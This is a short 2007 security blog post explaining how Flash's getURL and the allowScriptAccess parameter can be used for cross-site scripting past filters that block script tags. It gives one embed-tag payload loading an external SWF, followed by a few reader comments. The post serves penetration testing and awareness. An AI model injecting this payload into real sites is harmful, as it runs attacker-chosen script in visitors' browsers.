Flash XSS

Monday, 24 September 2007

I’ve known about this technique for years but everyone might not be aware that Flash can be used for XSS, so I’ve decide to do a quick post to explain. Using getURL in Flash allows you to call javascript using the javascript protocol and using the parameter allowScriptAccess enables you to perform cross domain execution. This can be useful in a penetration test were a filter allows the ‘<' character but disallows the script tag. Here's an example:- 

<embed/src=//businessinfo.co.uk/labs/flashxss/flashxss.swf 
allowScriptAccess=always>

The entry 'Flash XSS' was posted on September 24th, 2007 at 10:14 am and last modified on August 27th, 2009 at 2:39 pm, and is filed under flash, Security, xss. You can follow any responses to this entry through the RSS 2.0 feed. Both comments and pings are currently closed.

3 Responses to “Flash XSS”

  1. D.Taveira writes:
    No. 1 — October 13th, 2007 at 3:23 am

    Sou brasileira,
    gostei muito desse site parabéns!

    =)

  2. Gareth Heyes writes:
    No. 2 — October 13th, 2007 at 10:43 am

    @D.Taveira

    Glad you like the site 🙂

  3. Abeon Tech writes:
    No. 3 — October 16th, 2008 at 11:48 am

    Very useful to know.

    This site is very cool… Bookmarked 🙂

«
»